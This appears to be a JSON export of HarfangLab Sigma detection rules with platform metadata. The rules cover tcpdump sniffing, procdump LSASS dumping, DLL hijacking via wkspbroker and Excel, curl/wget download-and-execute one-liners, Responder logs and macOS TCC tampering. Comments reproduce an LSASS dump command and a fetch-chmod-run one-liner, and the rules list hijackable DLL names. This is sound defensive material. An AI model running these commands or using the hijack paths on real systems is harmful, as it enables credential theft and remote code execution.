"content": "title: Network Sniffed via tcpdump (macOS)\nid: 63f75270-bccf-4f9a-a525-1b0a4520eda4\ndescription: |\n Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to analyze the context around the execution of tcpdump to determine if it is result of a legitimate administrative actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/05/10\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Tcpdump\n - classification.macOS.Behavior.Discovery\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/tcpdump'\n\n # Explicitly use an OR because parents can be empty\n exclusion_wifivelocityd:\n - ParentImage: '/usr/libexec/wifivelocityd'\n - CommandLine|startswith: '/usr/sbin/tcpdump -q -n -i en0 -G 60 -W 1 -w /var/run/com.apple.wifivelocity/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63f75270-bccf-4f9a-a525-1b0a4520eda4",
"rule_name": "Network Sniffed via tcpdump (macOS)",
"rule_description": "Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to analyze the context around the execution of tcpdump to determine if it is result of a legitimate administrative actions.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "641d7001-4ba6-459b-80c2-175c48872aba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094976Z",
"creation_date": "2026-03-23T11:45:34.094978Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094982Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_procdump.yml",
"content": "title: Process Memory Dumped via procdump\nid: 641d7001-4ba6-459b-80c2-175c48872aba\ndescription: |\n Detects a suspicious attempt to dump a process' memory.\n This technique is often used to dump the LSASS.exe process memory.\n It is recommended to investigate the process reponsible for the memory dump and check the sensitivity of the data handled by the dumped process.\n For instance, LSASS.exe contains authentication secrets used by Windows during a session. The data handled by LSASS are highly sensitive, a dump of this process must be considered critical.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/04/15\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ProcDump\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # procdump64 -accepteula -ma lsass.exe C:\\windows\\temp\\lsass.dmp\n selection_bin:\n OriginalFileName: 'procdump'\n selection_cmd:\n CommandLine|contains: ' -ma '\n\n exclusion_werfault_system32:\n - ProcessParentCommandLine|contains|all:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n - ProcessGrandparentCommandLine|contains|all:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n\n exclusion_werfault_syswow64:\n - ProcessParentCommandLine|contains|all:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n - ProcessGrandparentCommandLine|contains|all:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '-u '\n - '-p '\n - '-s '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "641d7001-4ba6-459b-80c2-175c48872aba",
"rule_name": "Process Memory Dumped via procdump",
"rule_description": "Detects a suspicious attempt to dump a process' memory.\nThis technique is often used to dump the LSASS.exe process memory.\nIt is recommended to investigate the process reponsible for the memory dump and check the sensitivity of the data handled by the dumped process.\nFor instance, LSASS.exe contains authentication secrets used by Windows during a session. The data handled by LSASS are highly sensitive, a dump of this process must be considered critical.\n",
"rule_creation_date": "2021-04-15",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "643a4d88-8291-484a-9e2e-40b0e9baa9c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599203Z",
"creation_date": "2026-03-23T11:45:34.599209Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599218Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wkspbroker.yml",
"content": "title: DLL Hijacking via wkspbroker.exe\nid: 643a4d88-8291-484a-9e2e-40b0e9baa9c5\ndescription: |\n Detects potential Windows DLL Hijacking via wkspbroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wkspbroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\DNSAPI.dll'\n - '\\ktmw32.dll'\n - '\\PROPSYS.dll'\n - '\\RADCUI.dll'\n - '\\SspiCli.dll'\n - '\\tsworkspace.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "643a4d88-8291-484a-9e2e-40b0e9baa9c5",
"rule_name": "DLL Hijacking via wkspbroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wkspbroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "646cd21f-0ab5-4c42-ace5-ba0895d6b650",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618250Z",
"creation_date": "2026-03-23T11:45:34.618253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618257Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1059_004_remote_file_execution.yml",
"content": "title: Suspicious Download and Execution of a Remote File (macOS)\nid: 646cd21f-0ab5-4c42-ace5-ba0895d6b650\ndescription: |\n Detects the download and execution of a file in a one-liner command.\n Attackers may try to download and execute a remote payload as part of their kill chain.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/10/18\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.FileDownload\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n # tmp=”$(mktemp /tmp/XXXXXXXX)”; curl –retry 5 -f “[url]” -o “${tmp}”; if [[ -s “${tmp}” ]]; then chmod 777 “${tmp}”; “${tmp}”; fi; rm “${tmp}”\n ProcessParentImage|endswith:\n - '/sh'\n - '/bash'\n - '/csh'\n - '/dash'\n - '/ksh'\n - '/tcsh'\n - '/zsh'\n # use regexp to eliminate multi-line script\n ProcessParentCommandLine|re:\n - '^.*(wget|curl) *.*chmod *\\+x.*$'\n - '^.*(wget|curl) *.*chmod *7\\d\\d.*$'\n\n filter_expected:\n ProcessImage|endswith:\n - '/wget'\n - '/curl'\n - '/chmod'\n - '/mkdir'\n - '/mv'\n - '/cp'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "646cd21f-0ab5-4c42-ace5-ba0895d6b650",
"rule_name": "Suspicious Download and Execution of a Remote File (macOS)",
"rule_description": "Detects the download and execution of a file in a one-liner command.\nAttackers may try to download and execute a remote payload as part of their kill chain.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2024-10-18",
"rule_modified_date": "2025-01-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "647306ca-bd03-4108-ac71-b90bb1bb95fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612711Z",
"creation_date": "2026-03-23T11:45:34.612714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612722Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SpiderLabs/Responder",
"https://github.com/lgandx/Responder",
"https://attack.mitre.org/software/S0174/"
],
"name": "t1557_001_log_file_responder.yml",
"content": "title: Log Files Related to Responder Written\nid: 647306ca-bd03-4108-ac71-b90bb1bb95fd\ndescription: |\n Detects file writes on default Responder file logs.\n Responder is an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for privilege escalation, credential access and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.Filesystem\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Lateralization\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path|endswith:\n - '/logs/Poisoners-Session.log'\n - '/logs/Responder-Session.log'\n - '/logs/SMB-NTLMv2-SSP-*.txt'\n - '/logs/SMB-NTLMv2-Client-*.txt'\n - '/logs/SMB-NTLMSSPv2-Client-*.txt'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "647306ca-bd03-4108-ac71-b90bb1bb95fd",
"rule_name": "Log Files Related to Responder Written",
"rule_description": "Detects file writes on default Responder file logs.\nResponder is an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\nAttackers can use this tool for privilege escalation, credential access and lateral movement.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6474fd32-8cfd-41e6-b171-96fdd9a36020",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091937Z",
"creation_date": "2026-03-23T11:45:34.091939Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091944Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_excel.yml",
"content": "title: DLL Hijacking via Excel.exe\nid: 6474fd32-8cfd-41e6-b171-96fdd9a36020\ndescription: |\n Detects potential Windows DLL Hijacking via Excel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Excel.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\directmanipulation.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6474fd32-8cfd-41e6-b171-96fdd9a36020",
"rule_name": "DLL Hijacking via Excel.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Excel.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6480276d-6c1f-41b0-aa47-92423c017072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626586Z",
"creation_date": "2026-03-23T11:45:34.626588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626592Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/inital-research-of-jokerspy",
"https://attack.mitre.org/techniques/T1548/006/"
],
"name": "t1548_006_tcc_database_created_modified.yml",
"content": "title: Suspicious TCC Database Modification\nid: 6480276d-6c1f-41b0-aa47-92423c017072\ndescription: |\n Detects a suspicious modification of the Transparency, Consent, & Control (TCC) database.\n Adversaries may manipulate the TCC database to execute malicious content with privileged access.\n It is recommended to verify if the process performing the modification has legitimate reason to do so.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1548/006/\ndate: 2024/06/18\nmodified: 2026/01/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.006\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n # /Library/Application Support/com.apple.TCC/TCC.db\n # ~/Library/Application Support/com.apple.TCC/TCC.db\n - Path|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n - TargetPath|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n\n selection_process:\n ProcessImage|contains: '?'\n\n filter_read:\n Kind: 'read'\n\n filter_tccd:\n - Image:\n - '/System/Library/PrivateFrameworks/TCC.framework/Support/tccd'\n - '/System/Library/PrivateFrameworks/TCC.framework/Versions/A/Resources/tccd'\n - ProcessImage:\n - '/System/Library/PrivateFrameworks/TCC.framework/Support/tccd'\n - '/System/Library/PrivateFrameworks/TCC.framework/Versions/A/Resources/tccd'\n\n filter_privateframework:\n Image:\n - '/System/Library/PrivateFrameworks/SystemAdministration.framework/XPCServices/writeconfig.xpc/Contents/MacOS/writeconfig'\n - '/System/Library/PrivateFrameworks/SystemAdministration.framework/Resources/DirectoryTools'\n\n exclusion_sophos:\n - Image: '/Library/Sophos Anti-Virus/SophosServiceManager.app/Contents/MacOS/SophosServiceManager'\n - ProcessImage: '/Library/Sophos Anti-Virus/SophosServiceManager.app/Contents/MacOS/SophosServiceManager'\n\n exclusion_landesk:\n Image: '/Library/Application Support/LANDesk/bin/ivEMH.app/Contents/MacOS/ivEMH'\n\n exclusion_splashtop:\n Image: '/usr/bin/sqlite3'\n ProcessCommandLine:\n - \"sqlite3 /Library/Application Support/com.apple.TCC/TCC.db SELECT auth_value from access WHERE client='com.splashtop.Splashtop-Streamer' AND service='kTCCServiceRemoteDesktop';\"\n - \"sqlite3 /Library/Application Support/com.apple.TCC/TCC.db SELECT auth_value from access WHERE client='com.splashtop.Splashtop-Streamer.daemon' AND service='kTCCServiceCamera';\"\n\n exclusion_cybereason:\n ProcessParentImage: '/Library/PreferencePanes/ActiveProbe.prefPane/Contents/MacOS/CybereasonAv.app/Contents/MacOS/CybereasonAv'\n ProcessCommandLine: 'sqlite3 /Library/Application Support/com.apple.TCC/TCC.db select * from access'\n\n exclusion_desktopserviceshelper:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.DesktopServicesHelper'\n\n exclusion_chown:\n ProcessImage: '/usr/sbin/chown'\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_logout:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.sessionlogoutd'\n\n exclusion_directory:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.DirectoryTools'\n\n exclusion_authorization_host:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.authorizationhost'\n\n exclusion_mcafee:\n Image:\n - '/usr/local/McAfee/fmp/bin/fmpd'\n - '/usr/local/McAfee/fmp/bin64/fmpd'\n\n exclusion_carbon_copy_cloner:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.bombich.ccchelper'\n - 'com.bombich.ccc'\n\n exclusion_netgear_antivirus:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.netgear.antivirusformac'\n\n exclusion_orange_antivirus:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.orangefr.antivirusformac'\n\n exclusion_jumpcloud:\n ProcessCommandLine: \"sqlite3 /Library/Application Support/com.apple.TCC/TCC.db select auth_value from access where service='kTCCServiceScreenCapture' and client='com.jumpcloud.assist-app'\"\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6480276d-6c1f-41b0-aa47-92423c017072",
"rule_name": "Suspicious TCC Database Modification",
"rule_description": "Detects a suspicious modification of the Transparency, Consent, & Control (TCC) database.\nAdversaries may manipulate the TCC database to execute malicious content with privileged access.\nIt is recommended to verify if the process performing the modification has legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-01-13",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64c30585-b56c-4b85-9210-f2f288bbf74f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296021Z",
"creation_date": "2026-03-23T11:45:35.296024Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296031Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_susp_single_char_executable.yml",
